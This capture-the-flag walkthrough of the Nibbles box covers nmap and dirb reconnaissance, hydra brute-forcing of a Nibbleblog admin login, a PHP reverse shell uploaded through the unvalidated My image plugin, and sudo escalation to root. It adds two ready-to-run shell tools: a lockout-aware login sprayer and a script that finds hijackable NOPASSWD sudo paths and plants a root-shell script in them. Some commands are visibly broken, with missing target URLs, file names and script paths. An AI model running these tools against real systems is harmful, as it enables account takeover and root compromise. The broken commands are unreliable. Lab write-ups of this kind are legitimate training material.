Nibbles is an easy Linux box. The foothold is the administrator login page of a Nibbleblog install, which can be brute-forced (or simply guessed). Once authenticated, a file upload flaw in a plugin lets you upload a PHP reverse shell. Privileges are escalated by replacing a monitoring script that the user is allowed to run as root with sudo.


Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The first thing I checked was the web server. It serves a bare page that only says Hello world!. Viewing the page source (Ctrl+U) reveals the following HTML comment:

/nibbleblog/ directory. Nothing interesting here!

Naturally, you can navigate to the /nibbleblog/ directory, which hosts a Nibbleblog installation:

Next, as usual, the site was brute-forced for hidden files and directories with dirb, restricting the search to .php files:

dirb -X .php

The results were as follows:

+ (CODE:200|SIZE:1401)   

Brute-Forcing the Login Page

Navigating to /nibbleblog/admin.php presents a login page. This can be brute-forced with hydra like this:

hydra -l admin -P /usr/share/wordlists/rockyou.txt -vV -f -t 2 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"

[ATTEMPT] target - login "admin" - pass "password" - 1 of 10000 [child 0] (0/0)
[ATTEMPT] target - login "admin" - pass "123456" - 2 of 10000 [child 1] (0/0)

Hydra reports two hits, but both are false positives: neither password works. The reason is how the failure condition is evaluated. Hydra's http-post-form module treats every response that does not contain the failure string (login_error here) as a success, so as soon as the application starts returning a different page, for example a lockout or blacklist notice after repeated failed attempts, the following guesses are reported as valid. Always verify a reported hit by hand. In this case simple guessing works: admin with the password nibbles (the name of the box) logs you in, and you are presented with the standard dashboard.
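As an added example (not part of the original write-up), here is a small POSIX shell sprayer that applies the lesson above: it classifies each response three ways, so a lockout page is reported as a lockout and the spray stops, rather than the next guess being reported as a valid login. The form field names come from the hydra command in the write-up; the lockout marker Blacklist is an assumption and must be set to whatever the target actually returns after repeated failures.

```shell
#!/bin/sh
# Added example, not code from the original write-up.
# FAIL_MARK is the failure string the write-up uses with Hydra.
# LOCK_MARK is an ASSUMED substring of the lockout/blacklist page; adjust it
# to the real text the application returns after too many failed logins.
FAIL_MARK='login_error'
LOCK_MARK='Blacklist'

# classify_login_response BODY -> prints one of: lockout | fail | success
# Lockout is checked first: a lockout page also lacks FAIL_MARK, so checking
# FAIL_MARK alone (Hydra's logic) would mislabel it as a successful login.
classify_login_response() {
  case $1 in
    *"$LOCK_MARK"*) echo lockout ;;
    *"$FAIL_MARK"*) echo fail ;;
    *)              echo success ;;
  esac
}

# try_login URL USER PASS -> classification of the live response.
# Field names username/password are the ones the login form uses.
try_login() {
  body=$(curl -s --data-urlencode "username=$2" --data-urlencode "password=$3" "$1")
  classify_login_response "$body"
}

# spray URL USER WORDLIST: one attempt per line of WORDLIST.
# Stops on the first success (exit 0) or the first lockout (exit 2) so that
# guesses are not burned while the application is refusing every login.
# Exit 1 when the list is exhausted without a hit.
spray() {
  url=$1; user=$2; list=$3
  while IFS= read -r pass; do
    verdict=$(try_login "$url" "$user" "$pass")
    case $verdict in
      success) printf 'valid credentials: %s / %s\n' "$user" "$pass"; return 0 ;;
      lockout) printf 'lockout at "%s"; stop and wait before retrying\n' "$pass" >&2; return 2 ;;
    esac
  done < "$list"
  return 1
}

# Usage: ./spray.sh http://TARGET/nibbleblog/admin.php admin /usr/share/wordlists/rockyou.txt
if [ $# -eq 3 ]; then
  spray "$@"
fi
```

The script deliberately runs one request at a time; the write-up's -t 2 already shows that even two parallel workers are enough to trip the lockout before the wordlist gets anywhere.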


A Google search turned up the following description of a Metasploit module:

Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.

Go to Plugins and open the configure page of the My image plugin, which lets you upload a picture. The upload is not validated, so you can upload a PHP reverse shell instead; set its connect-back address and port to your machine and start a netcat listener on that port first. After clicking Save changes the page displays some PHP warnings. You can ignore these and continue to the directory where the plugin stores its uploads. It lists the PHP file you just uploaded; opening it triggers the reverse shell, which connects back as the user nibbler. user.txt is in this user's home directory.

Privilege Escalation

The next step is privilege escalation. I recommend running linpeas, which gives a great deal of information, including the sudo rules for the current user (sudo -l shows the same):

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/

I simply created this file, creating the directory path first where it did not exist and making the script executable with chmod +x:

$ cat

#!/bin/bash
echo "worked"

Executing sudo /home/nibbler/personal/stuff/ runs the script as root and prints worked, which confirms the rule applies. Replace the echo line with /bin/bash and run it again to get an interactive root shell, from which you can read root.txt.
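As an added example (not code from the original write-up), the following POSIX shell script generalises the check and the payload step above. Given sudo -l output on stdin, it lists every NOPASSWD command path the current user could take over, either because the file is writable or because it does not exist yet and the nearest existing ancestor directory is writable, so the path can be created. It then plants a script that execs a shell at a chosen path. Running sudo on that path is left to the operator; the function and variable names are my own.

```shell
#!/bin/sh
# Added example, not code from the original write-up.

# sudo_nopasswd_targets: read `sudo -l` text on stdin and print one absolute
# command path per line from every NOPASSWD rule (arguments and ALL dropped).
sudo_nopasswd_targets() {
  grep 'NOPASSWD:' |
    sed 's/.*NOPASSWD:[[:space:]]*//' |   # keep only the command list
    tr ',' '\n' |                         # one command per line
    awk '{ print $1 }' |                  # drop arguments
    { grep '^/' || true; }                # keep absolute paths; none is not an error
}

# hijackable_path PATH: exit 0 (and say why) if the current user can replace
# PATH or create it, exit 1 otherwise.
hijackable_path() {
  p=$1
  if [ -e "$p" ]; then
    if [ -w "$p" ]; then echo "writable: $p"; return 0; fi
    return 1
  fi
  d=$p
  while [ ! -e "$d" ]; do d=$(dirname "$d"); done   # nearest existing ancestor
  if [ -d "$d" ] && [ -w "$d" ]; then
    echo "missing, but creatable under writable directory $d: $p"
    return 0
  fi
  return 1
}

# check_sudo_hijack: usage `sudo -l | check_sudo_hijack`.
# Prints each hijackable target; exit 0 if at least one was found.
check_sudo_hijack() {
  found=1
  for t in $(sudo_nopasswd_targets); do
    hijackable_path "$t" && found=0
  done
  return $found
}

# plant_root_shell TARGET: create TARGET (and any missing directories) as a
# script that execs bash, and mark it executable. If TARGET is covered by a
# (root) NOPASSWD rule, `sudo TARGET` then drops into a root shell.
plant_root_shell() {
  t=$1
  mkdir -p "$(dirname "$t")" || return 1
  printf '#!/bin/bash\nexec /bin/bash\n' > "$t" || return 1
  chmod +x "$t"
}

# Command-line use:
#   sudo -l | sh sudocheck.sh check
#   sh sudocheck.sh plant /path/listed/in/the/rule
case ${1:-} in
  check) check_sudo_hijack ;;
  plant) plant_root_shell "$2" ;;
esac
```

The missing-path case matters as much as the writable-file case: a sudo rule keeps granting root to a path after the file it named has been deleted or moved, and whoever can write to the parent directory decides what runs there.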